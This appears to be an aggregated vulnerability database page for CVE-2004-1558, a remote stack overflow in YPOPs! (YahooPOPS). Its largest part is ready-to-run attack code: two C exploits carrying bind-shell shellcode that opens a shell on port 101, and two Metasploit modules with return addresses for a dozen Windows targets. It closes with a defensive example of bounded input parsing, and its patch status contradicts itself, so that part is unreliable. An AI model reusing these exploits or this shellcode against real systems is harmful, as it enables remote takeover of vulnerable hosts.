CVE-2004-1558
CVSS7.5
Published: 2004-12-31 00:00:00
Last revised: 2016-10-17 22:56:28

[Original] Multiple stack-based buffer overflows in YPOPs! (aka YahooPOPS) 0.4 through 0.6 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) POP3 USER command or (2) SMTP request.


[CNNVD] YahooPOPS! Multiple Remote Buffer Overflow Vulnerabilities (CNNVD-200412-1143)

YPOPs! (also known as YahooPOPS) versions 0.4 through 0.6 contain multiple stack-based buffer overflow vulnerabilities. A remote attacker can cause a denial of service (crash) and possibly execute arbitrary code via an overlong (1) POP3 USER command or (2) SMTP request.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:ypops:ypops:0.6
cpe:/a:ypops:ypops:0.4.5
cpe:/a:ypops:ypops:0.5
cpe:/a:ypops:ypops:0.4
cpe:/a:ypops:ypops:0.4.4
cpe:/a:ypops:ypops:0.4.6
cpe:/a:ypops:ypops:0.4.1
cpe:/a:ypops:ypops:0.4.3
cpe:/a:ypops:ypops:0.4.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1558
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1558
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1143
(official data source) CNNVD

- Other links and resources

http://dbeusee.home.comcast.net/history.html
(UNKNOWN)  CONFIRM  http://dbeusee.home.comcast.net/history.html
http://marc.info/?l=bugtraq&m=109630699829536&w=2
(UNKNOWN)  BUGTRAQ  20040927 [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS
http://securitytracker.com/alerts/2004/Sep/1011426.html
(UNKNOWN)  SECTRACK  1011426
http://www.attrition.org/pipermail/vim/2006-October/001089.html
(UNKNOWN)  VIM  20061020 vendor ACK for old YPOPs! issue
http://www.hat-squad.com/en/000075.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000075.html
http://www.securityfocus.com/bid/11256
(PATCH)  BID  11256
http://xforce.iss.net/xforce/xfdb/17515
(PATCH)  XF  ypops-pop3-bo(17515)
http://xforce.iss.net/xforce/xfdb/17518
(PATCH)  XF  ypops-smtp-bo(17518)

- Vulnerability information

YahooPOPS! Multiple Remote Buffer Overflow Vulnerabilities
High severity  Buffer overflow
2004-12-31 00:00:00 2006-10-30 00:00:00
Remote
YPOPs! (also known as YahooPOPS) versions 0.4 through 0.6 contain multiple stack-based buffer overflow vulnerabilities. A remote attacker can cause a denial of service (crash) and possibly execute arbitrary code via an overlong (1) POP3 USER command or (2) SMTP request.

- Advisories and patches

These issues have been addressed in version 0.6.050104.
YahooPOPS! YahooPOPS! 0.4
YahooPOPS! YahooPOPS! 0.5
YahooPOPS! YahooPOPS! 0.6

- Vulnerability information (577)

YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit (EDBID:577)
windows remote
2004-10-15 Verified
25 class101
N/A [Download]
/*

YahooPOPS v1.6 and prior SMTP port buffer overflow exploit v0.1
Exploit code by class101 [at] DFind.kd-team.com 
Bind a shellcode to the port 101.

Thanx to Behrang Fouladi(behrang@hat-squad.com) for the bug discovery
Thanx to HDMoore and Metasploit.com for their kickass ASM work

Instead of to move like you Behrang EBX to ESP after overwritting EIP, 
I found out that only jumping to EBX is needed because our crafted payload 
starts at EBX.

The exploit is tested working on Win2K SP4 and WinXP SP1, and it should works 
also on NT4 and 2003 as the shellcode is designed for.

The jmp esp is from libcurl.dll wich come with yahoopops, just to notice there is no need of an offset update, 
this is already "universal".

This exploit can't overflow the port 110 (POP3), not enough space in the buffer to add a bind/reverse shell
maybe enough to spawn only one as the well know KaHT.
If you want to try on POP3, you should request more than 180 bytes to overwrite EAX and ECX
Maybe in a v0.2, I will add it , anyway check http://DFind.kd-team.com regulary.

*/

#include "winsock2.h"
#include "fstream.h"

#pragma comment(lib, "ws2_32")

char scode[] =  //BIND shellcode port 101, thanx HDMoore. 
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[1024];

char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3";  //JMP EBX

void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
	ver();
	if ((argc<2)||(argc>3)){usage(argv[0]);return -1;}
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
	char recvbuf[100];
	int ip=htonl(inet_addr(argv[1])), port, size, x;
	if (argc==3){port=atoi(argv[2]);}
	else port=25;
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
		case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			cout<<"[+] connected, checking the server..."<<endl;
			Sleep(1000);recv(s,recvbuf,200,0);
			if (strstr(recvbuf,"OK POP3 YahooPOPs")){cout<<"[+] this is not the POP3 port but the SMTP port that you should use."<<endl;return -1;}
			if (!strstr(recvbuf,"220 YahooPOPs")){cout<<"[+] this is not a YahooPOPS server, quitting..."<<endl;return -1;}
			cout<<"[+] YahooPOPS SMTP detected, constructing the payload"<<endl;
			size=508-sizeof(scode);
			memset(payload,0,sizeof(payload));
			for (x=0;x<size;x++){strcat(payload,"\x90");}
			strcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);
		    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
			cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
			return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}


void usage(char* us) 
{  
	cout<<"USAGE: 101_ypops.exe ip port\n"<<endl;
	cout<<"NOTE: The port should be the SMTP, not POP3!"<<endl;
	cout<<"      The port 25 is default if no port specified."<<endl;
	cout<<"      The exploit bind a shellcode to the port 101."<<endl;
	return;
} 

void ver()
{	
cout<<endl;
cout<<"                                                                   "<<endl;
cout<<"        ===================================================[v0.1]==="<<endl;
cout<<"        ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit==="<<endl;
cout<<"        =====coded by class101===========[DFind.kd-team.com 2004]==="<<endl;
cout<<"        ============================================================"<<endl;
cout<<"                                                                   "<<endl;
}

// milw0rm.com [2004-10-15]
		

- Vulnerability information (582)

YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit (EDBID:582)
windows remote
2004-10-18 Verified
25 Diabolic Crab
N/A [Download]
//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP
//dcrab@hackerscenter.com
//www.hackerscenter.com
//For more work check out, http://icis.digitalparadox.org
//This was done at 4 am so escuse the messy code if any
//Good job class101 on the windows version ;)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>

char scode[] = //Bind shell on port 101, taken from the windows exploit by class101
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

static char payload[1024];

char jmp[]="\x23\x9b\x02\x10"; //JMP ESP
char jmpebx[]="\xff\xe3"; //JMP EBX

void usage(char* us);
void ver();

 int main(int argc, char *argv[])
 {
     ver();
         char grab[999];
         int sock;
         if (argc<4){
         usage(argv[0]);return -1;
                        }
         int ip=htonl(inet_addr(argv[1])), port, size, x;
         if (argc==3){port=atoi(argv[2]);}
         else port=25;
         struct hostent *aap;
         struct sockaddr_in addr;
         if((aap=(struct hostent *)gethostbyname(argv[1]))==NULL) {
         perror("Gethostbyname()");
         exit(1); }
         if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
         perror("Socket()");
         exit(1); }
                 addr.sin_family=AF_INET;
                 addr.sin_port=htons(port);
                 memcpy((char *)&addr.sin_addr,(char *)aap->h_addr,aap->h_length);
         if(connect(sock,(struct sockaddr *)&addr,sizeof(addr))!=0) {
         perror("Connect()");
         exit(0); }
                 printf ("[+] Connected\n");
                 fflush(stdin);
                 sleep(2);
                 read(sock,grab,200);
                 printf ("[+] Reading Banner\n");
         if (!strstr(grab,"220 YahooPOPs")) {
         printf("[+] this is not a YahooPOPS server, quitting...\n");
         return -1; }
                 printf ("[+] Found YahooPOP's Server\n");
                 size=508-sizeof(scode);
                 memset(payload,0,sizeof(payload));
                 for (x=0;x<size;x++){strcat(payload,"\x90");}
                 
strcat(payload,scode);strcat(payload,jmp);strcat(payload,jmpebx);
                 printf ("[+] Sending Shellcode\n");
         if (send(sock, payload, strlen(payload), 0) < 0) {
         perror("Send()");
         exit(0); }
                 printf ("[+] Sleep for 3 seconds\n");
                 sleep(3);
                 char hack[100];
                 sprintf (hack, "telnet %s 101", argv[1]);
                 system (hack);
                 return 0;
 }

void usage(char* us)
{
                 printf("Usage: ./dc_ypop ip port\n");
                 printf("The exploit binds a shell to the port 101.\n");
                 return;
}

void ver()
{
                 printf ("################################################################\n");
                 printf ("# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #\n");
                 printf ("# dcrab@hackerscenter.com www.hackerscenter.com #\n");
                 printf ("# Credits to Behrang Fouladi for finding this bug #\n");
                 printf ("################################################################\n");
}

// milw0rm.com [2004-10-18]
		

- Vulnerability information (16818)

YPOPS 0.6 Buffer Overflow (EDBID:16818)
windows remote
2010-05-09 Verified
25 metasploit
N/A [Download]
##
# $Id: ypops_overflow1.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Smtp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'YPOPS 0.6 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the YPOPS POP3
				service.

				This is a classic stack buffer overflow for YPOPS version 0.6.
				Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
				jmp ebx opcode in ws_32.dll
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-1558'],
					[ 'OSVDB', '10367'],
					[ 'BID', '11256'],
					[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],
				],
			'Platform'       => 'win',
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1200,
					'BadChars' => "\x00\x25",
					'MinNops'  => 106,
				},
			'Targets'        =>
				[
					[ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
					[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
					[ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
				],
			'DisclosureDate' => 'Sep 27 2004'))
	end

	def check
		connect
		disconnect

		banner.gsub!(/\n/, '')

		if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
			print_status("Vulnerable SMTP server: #{banner}")
			return Exploit::CheckCode::Detected
		end

		print_status("Unknown SMTP server: #{banner}")
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		pattern =
			rand_text_alpha(target['Offset'] - payload.encoded.length) +
			payload.encoded +
			[target.ret].pack('V') +
			"\n"

		print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")

		sock.put(pattern)

		handler
		disconnect
	end

end
		

- Vulnerability information (F83157)

YPOPS 0.6 Buffer Overflow (PacketStormID:F83157)
2009-11-26 00:00:00
acaro  metasploit.com
exploit,overflow
CVE-2004-1558
[Download]

This Metasploit module exploits a stack overflow in the YPOPS POP3 service. This is a classic stack overflow for YPOPS version 0.6. Possibly affected versions: 0.5, 0.4.5.1, 0.4.5. EIP points to a jmp ebx opcode in ws_32.dll.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Smtp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'YPOPS 0.6 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the YPOPS POP3
				service.

				This is a classic stack overflow for YPOPS version 0.6.
				Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
				jmp ebx opcode in ws_32.dll
					
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-1558'],
					[ 'OSVDB', '10367'],
					[ 'BID', '11256'],
					[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],

				],
			'Platform'       => 'win',
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1200,
					'BadChars' => "\x00\x25",
					'MinNops'  => 106,

				},
			'Targets'        => 
				[
					[ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
					[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
					[ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
					[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
					[ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
					[ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
				],
			'DisclosureDate' => 'Sep 27 2004'))
	end

	def check
		connect
		disconnect

		banner.gsub!(/\n/, '')

		if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
			print_status("Vulnerable SMTP server: #{banner}")
			return Exploit::CheckCode::Detected
		end

		print_status("Unknown SMTP server: #{banner}")
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		pattern = 
			rand_text_alpha(target['Offset'] - payload.encoded.length) +
			payload.encoded +
			[target.ret].pack('V') + 
			"\n"

		print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")

		sock.put(pattern)
		
		handler
		disconnect
	end

end
    

- Vulnerability information

10366
YahooPOPS POP3 Service USER Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in YPOPS!. YPOPS! fails to validate input on POP3 requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause execution of arbitrary code resulting in a loss of integrity.
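
The input-validation failure described above, shown as an added illustration that is not YPOPs! source code: a hypothetical POP3 USER handler in its unsafe form (an unbounded strcpy() of the client-supplied argument into a fixed-size stack buffer, which is the bug class this entry names) beside a hardened form that measures the argument against the destination before copying and refuses what does not fit. The buffer sizes, function names and the constructed sample lines are all assumptions made for the demo.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added illustration of the bug class behind CVE-2004-1558; not YPOPs! code.
 * The sizes below are assumptions chosen for the demo. */
#define USERNAME_MAX 64      /* assumed size of the username stack buffer */
#define LINE_MAX_LEN 512     /* assumed longest command line the server accepts */

enum pop3_result { POP3_OK = 0, POP3_ERR_SYNTAX = -1, POP3_ERR_TOOLONG = -2 };

/* UNSAFE form (shown for contrast, never called by the demo or the tests):
 * strcpy() copies whatever the client sent, so a USER argument longer than
 * the destination overruns the stack frame. */
void copy_user_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);               /* no bound check */
}

/* Hardened form: the argument length is checked against the destination
 * before anything is copied, and the result is always NUL-terminated. */
int copy_user_safe(char *dst, size_t dstsz, const char *arg, size_t arglen)
{
    if (arglen == 0)
        return POP3_ERR_SYNTAX;     /* "USER" with no mailbox name */
    if (arglen >= dstsz)
        return POP3_ERR_TOOLONG;    /* would not fit together with its terminator */
    memcpy(dst, arg, arglen);
    dst[arglen] = '\0';
    return POP3_OK;
}

/* Parse one "USER <name>\r\n" line into user[usersz]. The keyword is
 * case-insensitive as in RFC 1939; the whole line is bounded first so an
 * oversized request is refused before its contents are examined. */
int pop3_parse_user(const char *line, char *user, size_t usersz)
{
    size_t len = strlen(line);
    if (len > LINE_MAX_LEN)
        return POP3_ERR_TOOLONG;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                      /* strip CRLF */
    if (len < 5)
        return POP3_ERR_SYNTAX;
    for (int i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != "USER"[i])
            return POP3_ERR_SYNTAX;
    if (line[4] != ' ')
        return POP3_ERR_SYNTAX;
    return copy_user_safe(user, usersz, line + 5, len - 5);
}

/* Small wrappers so a caller can check the outcome and the stored name. */
static char g_user[USERNAME_MAX];

int pop3_user_check(const char *line)
{
    return pop3_parse_user(line, g_user, sizeof g_user);
}

const char *pop3_last_user(void)
{
    return g_user;
}

/* Constructed sample input: "USER " + n * 'A' + "\r\n" (n capped at 1024). */
const char *constructed_user_line(size_t n)
{
    static char buf[1024 + 8];
    if (n > 1024) n = 1024;
    memcpy(buf, "USER ", 5);
    memset(buf + 5, 'A', n);
    memcpy(buf + 5 + n, "\r\n", 3);  /* copies the terminating NUL as well */
    return buf;
}

int main(void)
{
    const char *samples[] = { "USER alice\r\n", "PASS secret\r\n",
                              constructed_user_line(500) };
    for (size_t i = 0; i < 3; i++) {
        int r = pop3_user_check(samples[i]);
        printf("%-12.12s... -> %s\n", samples[i],
               r == POP3_OK ? "+OK" :
               r == POP3_ERR_TOOLONG ? "-ERR too long" : "-ERR syntax");
    }
    return 0;
}
```

The hardened path rejects in two places: once on the raw line length, before the parser reads any byte of an oversized request, and again on the argument length against the exact destination size. Either check alone would have stopped the overlong USER command this entry describes; keeping both means a later change to one buffer size cannot silently reopen the hole.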

- Timeline

2004-09-27 Unknown
2004-09-27 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): Disable the SMTP service and bind only the POP3 service to the loopback interface.

- References

- Vulnerability author
